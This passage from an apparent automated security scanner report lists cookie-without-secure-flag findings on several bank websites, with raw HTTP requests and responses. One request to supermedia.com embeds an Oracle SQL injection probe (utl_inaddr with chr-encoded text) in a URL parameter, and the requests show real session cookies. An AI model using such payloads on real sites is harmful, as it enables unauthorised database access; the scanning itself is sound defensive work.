The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /personal_banking/platinum_visa_check.rf HTTP/1.1
Host: www.regions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: www.regions.com-ssl=R1752032910; WT_FPC=id=2748f8ec8c6b6416b0b1296748179248:lv=1296748179248:ss=1296748179248; www.regions.com-http=R1402660298; ASP.NET_SessionId=phjubd2yvc5erifye2te4a55;

Response

HTTP/1.1 302 Found
Set-Cookie: www.regions.com-ssl=R1752032910; path=/
Connection: close
Date: Thu, 03 Feb 2011 15:50:10 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: http://www.regions.com/personal_banking/platinum_visa_check.rf
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 179

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://www.regions.com/personal_banking/platinum_visa_check.rf">here</a>.</h2>
</body></html>

10.123. https://www.regions.com/personal_banking/private_client.rf  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.regions.com
Path:   /personal_banking/private_client.rf

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /personal_banking/private_client.rf HTTP/1.1
Host: www.regions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: www.regions.com-ssl=R1752032910; WT_FPC=id=2748f8ec8c6b6416b0b1296748179248:lv=1296748179248:ss=1296748179248; www.regions.com-http=R1402660298; ASP.NET_SessionId=phjubd2yvc5erifye2te4a55;

Response

HTTP/1.1 302 Found
Set-Cookie: www.regions.com-ssl=R1752032910; path=/
Connection: close
Date: Thu, 03 Feb 2011 15:50:22 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: http://www.regions.com/personal_banking/private_client.rf
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 174

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://www.regions.com/personal_banking/private_client.rf">here</a>.</h2>
</body></html>

10.124. https://www.regions.com/personal_banking/regionsnet.rf  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.regions.com
Path:   /personal_banking/regionsnet.rf

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /personal_banking/regionsnet.rf HTTP/1.1
Host: www.regions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: www.regions.com-ssl=R1752032910; WT_FPC=id=2748f8ec8c6b6416b0b1296748179248:lv=1296748179248:ss=1296748179248; www.regions.com-http=R1402660298; ASP.NET_SessionId=phjubd2yvc5erifye2te4a55;

Response

HTTP/1.1 302 Found
Set-Cookie: www.regions.com-ssl=R1752032910; path=/
Connection: close
Date: Thu, 03 Feb 2011 15:50:15 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: http://www.regions.com/personal_banking/regionsnet.rf
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 170

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://www.regions.com/personal_banking/regionsnet.rf">here</a>.</h2>
</body></html>

10.125. https://www.regions.com/personal_banking/regionsnet_bill_pay.rf  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.regions.com
Path:   /personal_banking/regionsnet_bill_pay.rf

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /personal_banking/regionsnet_bill_pay.rf HTTP/1.1
Host: www.regions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: www.regions.com-ssl=R1752032910; WT_FPC=id=2748f8ec8c6b6416b0b1296748179248:lv=1296748179248:ss=1296748179248; www.regions.com-http=R1402660298; ASP.NET_SessionId=phjubd2yvc5erifye2te4a55;

Response

HTTP/1.1 302 Found
Set-Cookie: www.regions.com-ssl=R1752032910; path=/
Connection: close
Date: Thu, 03 Feb 2011 15:50:16 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: http://www.regions.com/personal_banking/regionsnet_bill_pay.rf
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 179

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://www.regions.com/personal_banking/regionsnet_bill_pay.rf">here</a>.</h2>
</body></html>

10.126. https://www.regions.com/personal_banking/retirement_planning.rf  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.regions.com
Path:   /personal_banking/retirement_planning.rf

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /personal_banking/retirement_planning.rf HTTP/1.1
Host: www.regions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: www.regions.com-ssl=R1752032910; WT_FPC=id=2748f8ec8c6b6416b0b1296748179248:lv=1296748179248:ss=1296748179248; www.regions.com-http=R1402660298; ASP.NET_SessionId=phjubd2yvc5erifye2te4a55;

Response

HTTP/1.1 302 Found
Set-Cookie: www.regions.com-ssl=R1752032910; path=/
Connection: close
Date: Thu, 03 Feb 2011 15:50:22 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: http://www.regions.com/personal_banking/retirement_planning.rf
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 179

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://www.regions.com/personal_banking/retirement_planning.rf">here</a>.</h2>
</body></html>

10.127. https://www.regions.com/personal_banking/savings_cds.rf  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.regions.com
Path:   /personal_banking/savings_cds.rf

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /personal_banking/savings_cds.rf HTTP/1.1
Host: www.regions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: www.regions.com-ssl=R1752032910; WT_FPC=id=2748f8ec8c6b6416b0b1296748179248:lv=1296748179248:ss=1296748179248; www.regions.com-http=R1402660298; ASP.NET_SessionId=phjubd2yvc5erifye2te4a55;

Response

HTTP/1.1 302 Found
Set-Cookie: www.regions.com-ssl=R1752032910; path=/
Connection: close
Date: Thu, 03 Feb 2011 15:50:07 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: http://www.regions.com/personal_banking/savings_cds.rf
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 171

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://www.regions.com/personal_banking/savings_cds.rf">here</a>.</h2>
</body></html>

10.128. https://www.regions.com/personal_banking/trust_asset.rf  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.regions.com
Path:   /personal_banking/trust_asset.rf

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /personal_banking/trust_asset.rf HTTP/1.1
Host: www.regions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: www.regions.com-ssl=R1752032910; WT_FPC=id=2748f8ec8c6b6416b0b1296748179248:lv=1296748179248:ss=1296748179248; www.regions.com-http=R1402660298; ASP.NET_SessionId=phjubd2yvc5erifye2te4a55;

Response

HTTP/1.1 302 Found
Set-Cookie: www.regions.com-ssl=R1752032910; path=/
Connection: close
Date: Thu, 03 Feb 2011 15:50:20 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: http://www.regions.com/personal_banking/trust_asset.rf
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 171

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://www.regions.com/personal_banking/trust_asset.rf">here</a>.</h2>
</body></html>

10.129. https://www.regions.com/small_business.rf  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.regions.com
Path:   /small_business.rf

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /small_business.rf HTTP/1.1
Host: www.regions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: www.regions.com-ssl=R1752032910; WT_FPC=id=2748f8ec8c6b6416b0b1296748179248:lv=1296748179248:ss=1296748179248; www.regions.com-http=R1402660298; ASP.NET_SessionId=phjubd2yvc5erifye2te4a55;

Response

HTTP/1.1 200 OK
Set-Cookie: www.regions.com-ssl=R1752032910; path=/
Connection: close
Date: Thu, 03 Feb 2011 15:50:00 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 24375


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><titl
...[SNIP]...

10.130. https://www.regions.com/system/gateway.rf  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.regions.com
Path:   /system/gateway.rf

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /system/gateway.rf HTTP/1.1
Host: www.regions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: www.regions.com-ssl=R1752032910; WT_FPC=id=2748f8ec8c6b6416b0b1296748179248:lv=1296748179248:ss=1296748179248; www.regions.com-http=R1402660298; ASP.NET_SessionId=phjubd2yvc5erifye2te4a55;

Response

HTTP/1.1 302 Found
Set-Cookie: www.regions.com-ssl=R1752032910; path=/
Connection: close
Date: Thu, 03 Feb 2011 15:50:31 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: http://www.regions.com/system/gateway.rf
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 157

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://www.regions.com/system/gateway.rf">here</a>.</h2>
</body></html>

10.131. https://www.regions.com/templateOverview.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.regions.com
Path:   /templateOverview.aspx

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /templateOverview.aspx HTTP/1.1
Host: www.regions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: www.regions.com-ssl=R1752032910; WT_FPC=id=2748f8ec8c6b6416b0b1296748179248:lv=1296748179248:ss=1296748179248; www.regions.com-http=R1402660298; ASP.NET_SessionId=phjubd2yvc5erifye2te4a55;

Response

HTTP/1.1 200 OK
Set-Cookie: www.regions.com-ssl=R1752032910; path=/
Connection: close
Date: Thu, 03 Feb 2011 15:50:36 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 25921


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><titl
...[SNIP]...

10.132. https://www.regions.com/virtualMedia/img2297.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.regions.com
Path:   /virtualMedia/img2297.gif

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /virtualMedia/img2297.gif HTTP/1.1
Host: www.regions.com
Connection: keep-alive
Referer: https://www.regions.com/personal_banking.rf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: www.regions.com-http=R1402660298; ASP.NET_SessionId=phjubd2yvc5erifye2te4a55; www.regions.com-ssl=R1752032910

Response

HTTP/1.1 200 OK
Set-Cookie: www.regions.com-ssl=R1752032910; path=/
Content-Length: 5484
Content-Type: image/gif
Last-Modified: Mon, 07 Jun 2010 17:39:23 GMT
Accept-Ranges: bytes
ETag: "20c8e25d686cb1:7c0f"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Thu, 03 Feb 2011 15:49:18 GMT

GIF89a..P...........()...'..dN...sH3.....x.......ue....jU.....M.ye....TZ.ZD............x...R;...A(.............sSD...xog.....u......M5'...qbW......m.v..f......TF9...f?(IVC......P..TcX............n...
...[SNIP]...

10.133. https://www.regions.com/virtualMedia/img2608.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.regions.com
Path:   /virtualMedia/img2608.gif

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /virtualMedia/img2608.gif HTTP/1.1
Host: www.regions.com
Connection: keep-alive
Referer: https://www.regions.com/personal_banking.rf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: www.regions.com-http=R1402660298; ASP.NET_SessionId=phjubd2yvc5erifye2te4a55; www.regions.com-ssl=R1752032910

Response

HTTP/1.1 200 OK
Set-Cookie: www.regions.com-ssl=R1752032910; path=/
Content-Length: 4948
Content-Type: image/gif
Last-Modified: Tue, 26 Oct 2010 17:36:44 GMT
Accept-Ranges: bytes
ETag: "b0b6855b3475cb1:7c0f"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Thu, 03 Feb 2011 15:49:18 GMT

GIF89a..P...................s..ks..hG.........Yg.OVl.........jG-...............OOU..........................H.........iz...oxws............:Df.....$-4Q...fj{.........T:&.........Z`x......K\...........
...[SNIP]...

10.134. https://www.regions.com/virtualMedia/img2853.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.regions.com
Path:   /virtualMedia/img2853.jpg

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /virtualMedia/img2853.jpg HTTP/1.1
Host: www.regions.com
Connection: keep-alive
Referer: https://www.regions.com/personal_banking.rf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: www.regions.com-http=R1402660298; ASP.NET_SessionId=phjubd2yvc5erifye2te4a55; www.regions.com-ssl=R1752032910

Response

HTTP/1.1 200 OK
Set-Cookie: www.regions.com-ssl=R1752032910; path=/
Content-Length: 28854
Content-Type: image/jpeg
Last-Modified: Wed, 26 Jan 2011 15:40:17 GMT
Accept-Ranges: bytes
ETag: "60c215556fbdcb1:7c0f"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Thu, 03 Feb 2011 15:49:17 GMT

......JFIF.....d.d......Ducky.......<......Adobe.d....................    ...    .......

.

...............................................................................................................
...[SNIP]...

10.135. https://www.regions.com/virtualMedia/img2859.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.regions.com
Path:   /virtualMedia/img2859.gif

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /virtualMedia/img2859.gif HTTP/1.1
Host: www.regions.com
Connection: keep-alive
Referer: https://www.regions.com/personal_banking.rf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: www.regions.com-http=R1402660298; ASP.NET_SessionId=phjubd2yvc5erifye2te4a55; www.regions.com-ssl=R1752032910

Response

HTTP/1.1 200 OK
Set-Cookie: www.regions.com-ssl=R1752032910; path=/
Content-Length: 3492
Content-Type: image/gif
Last-Modified: Thu, 27 Jan 2011 15:21:16 GMT
Accept-Ranges: bytes
ETag: "a044d735becb1:7c0f"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Thu, 03 Feb 2011 15:49:17 GMT

GIF89a..!.................h..................f..............w..............3........D.."..U.U........[.....u.............W.................Z........f..Y........W..]..a..n........_......x._........l..
...[SNIP]...

10.136. https://www.regions.com/virtualMedia/img2861.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.regions.com
Path:   /virtualMedia/img2861.gif

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /virtualMedia/img2861.gif HTTP/1.1
Host: www.regions.com
Connection: keep-alive
Referer: https://www.regions.com/personal_banking.rf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: www.regions.com-http=R1402660298; ASP.NET_SessionId=phjubd2yvc5erifye2te4a55; www.regions.com-ssl=R1752032910

Response

HTTP/1.1 200 OK
Set-Cookie: www.regions.com-ssl=R1752032910; path=/
Content-Length: 4877
Content-Type: image/gif
Last-Modified: Thu, 27 Jan 2011 16:22:00 GMT
Accept-Ranges: bytes
ETag: "504d5e533ebecb1:7c0f"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Thu, 03 Feb 2011 15:49:18 GMT

GIF89a..P....p.H.....i...............OJNQ.3............slmz.F......u.6..vf.9...Js4........E.................\.......................p..Ul."..Q........}s.a..Dgl`.............................._.6.......
...[SNIP]...

10.137. https://www.regions.com/virtualMedia/img482.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.regions.com
Path:   /virtualMedia/img482.jpg

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /virtualMedia/img482.jpg HTTP/1.1
Host: www.regions.com
Connection: keep-alive
Referer: https://www.regions.com/personal_banking.rf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: www.regions.com-http=R1402660298; ASP.NET_SessionId=phjubd2yvc5erifye2te4a55; www.regions.com-ssl=R1752032910

Response

HTTP/1.1 200 OK
Set-Cookie: www.regions.com-ssl=R1752032910; path=/
Content-Length: 4923
Content-Type: image/jpeg
Last-Modified: Wed, 26 Sep 2007 05:35:18 GMT
Accept-Ranges: bytes
ETag: "10151b6ffffc71:7c0f"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Thu, 03 Feb 2011 15:49:18 GMT

......JFIF.....d.d......Ducky.......<......Adobe.d....................    ...    .......

.

..........................................................................................................P....
...[SNIP]...

10.138. https://www.suntrust.com/imageserver/plumtree/common/private/js/jsincluder/LATEST/PTIncluder.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.suntrust.com
Path:   /imageserver/plumtree/common/private/js/jsincluder/LATEST/PTIncluder.js

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /imageserver/plumtree/common/private/js/jsincluder/LATEST/PTIncluder.js HTTP/1.1
Host: www.suntrust.com
Connection: keep-alive
Referer: https://www.suntrust.com/portal/server.pt/community/checking_account_selector'/440
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 04 Feb 2011 18:59:29 GMT
Content-Type: application/x-javascript
Last-Modified: Tue, 21 Oct 2008 20:11:32 GMT
Accept-Ranges: bytes
ETag: "8fb1ea35b933c91:228d"
Server: Microsoft-IIS/6.0
Host-Name: P13B
X-Powered-By: ASP.NET
Set-Cookie: BIGipServerwww.suntrust.com-pvic=1000473610.20480.0000; path=/
Vary: Accept-Encoding, User-Agent
Content-Length: 3569


PTIncluder = function() {}

PTIncluder.VERSION            = '246682';
PTIncluder.INCLUDES_FILE    = 'component.js';
PTIncluder.PT_DEBUG_COOKIE    = 'PT_DEBUG';
PTIncluder.supportedLocales = {};
PTIncluder.sup
...[SNIP]...

10.139. https://www.supermedia.com/spportal/spportalFlow.do  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.supermedia.com
Path:   /spportal/spportalFlow.do

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /spportal/spportalFlow.do?_flowExecutionKey=%27%7C%7C(utl_inaddr.get_host_address((select+chr(95)%7C%7Cchr(33)%7C%7Cchr(64)%7C%7Cchr(51)%7C%7Cchr(100)%7C%7Cchr(105)%7C%7Cchr(108)%7C%7Cchr(101)%7C%7Cchr(109)%7C%7Cchr(109)%7C%7Cchr(97)+from+DUAL)))%7C%7C%27 HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: www.supermedia.com
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:00:04 GMT
Set-Cookie: JSESSIONID=288FFBAC45FB01B3489845E2C7FB3FFF.app3-a1; Path=/; Secure
Set-Cookie: trafficSource=default; Expires=Sat, 05-Mar-2011 18:59:58 GMT; Path=/
Set-Cookie: CstrStatus=U; Expires=Sat, 05-Mar-2011 18:59:58 GMT; Path=/
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Cache-Control: no-store
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Connection: close
Set-Cookie: NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139e45525d5f4f58455e445a4a42378b;path=/
Content-Length: 19973


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<!-- UI framework designed and implemented by Advertiser Portal UI Team -->

<title>SuperPages
...[SNIP]...

10.140. https://www.us.hsbc.com/1/2/3/hsbcpremier/contact-us-form  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.us.hsbc.com
Path:   /1/2/3/hsbcpremier/contact-us-form

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /1/2/3/hsbcpremier/contact-us-form HTTP/1.1
Host: www.us.hsbc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: HSBC_COOKIEMI=af4a9330-2fae-11e0-9be0-000503030601; WT_FPC=id=173.193.214.243-1912428224.30131131:lv=1296770468348:ss=1296770438495; SCM_COOKIE=uid=0|val=m7e%2FaaZaQhL1C2gNe7%2BBLn4fyXiwQYH2hOH5Tfa0J9okxNOqmNMcbA%3D%3D; www.us.hsbc.com-VH=63510956.20992.0000; USIB2G=0000VARK-5IjNHt3QWqaQC_Ukrf:14k1jbteq;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 17:09:13 GMT
Server: IBM_HTTP_Server
Cache-Control: private
Cache-Control: max-age=60
Expires: Thu, 03 Feb 2011 17:10:13 GMT
Vary: User-Agent,Cookie
Set-Cookie: USIB2G=0000iCqR-0svBcJPMWNx9j9Jai6:14k1jbteq; Path=/
Set-Cookie: CAMToken=zT+vap32WY2QfMIaqlxOBx3iIU4=; Path=/1; Secure
S: hbus-vh502_1
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Language: en
Content-Length: 34157

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">


   <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <meta http-equiv="Content-Type" content="
...[SNIP]...

10.141. https://www.us.hsbc.com/1/2/3/personal/online-services/personal-internet-banking/log-on  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.us.hsbc.com
Path:   /1/2/3/personal/online-services/personal-internet-banking/log-on

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /1/2/3/personal/online-services/personal-internet-banking/log-on HTTP/1.1
Host: www.us.hsbc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: HSBC_COOKIEMI=af4a9330-2fae-11e0-9be0-000503030601; WT_FPC=id=173.193.214.243-1912428224.30131131:lv=1296770468348:ss=1296770438495; SCM_COOKIE=uid=0|val=m7e%2FaaZaQhL1C2gNe7%2BBLn4fyXiwQYH2hOH5Tfa0J9okxNOqmNMcbA%3D%3D; www.us.hsbc.com-VH=63510956.20992.0000; USIB2G=0000VARK-5IjNHt3QWqaQC_Ukrf:14k1jbteq;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 17:09:09 GMT
Server: IBM_HTTP_Server
Cache-Control: private
Cache-Control: max-age=60
Expires: Thu, 03 Feb 2011 17:10:09 GMT
Vary: User-Agent,Cookie
Set-Cookie: USIB2G=0000RrQWzP_uaKImrSDJuRHMmav:14k1jbteq; Path=/
Set-Cookie: CAMToken=8yJSFvsmfjijg6MsjugN571fSOU=; Path=/1; Secure
Set-Cookie: SCM_COOKIE=""; Expires=Thu, 01 Dec 1994 16:00:00 GMT; Path=/
Set-Cookie: SCM_COOKIE=""; Expires=Thu, 01 Dec 1994 16:00:00 GMT; Path=/
Set-Cookie: SCM_COOKIE=uid=0|val=m7e%2FaaZaQhL1C2gNe7%2BBLn4fyXiwQYH2hOH5Tfa0J9okxNOqmNMcbA%3D%3D; Expires=Tue, 02 Feb 2016 17:09:09 GMT; Path=/
S: hbus-vh502_1
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Language: en
Content-Length: 27426

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">


   <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <meta http-equiv="Content-Type" content=
...[SNIP]...

10.142. https://www.wachovia.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.wachovia.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.wachovia.com
Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
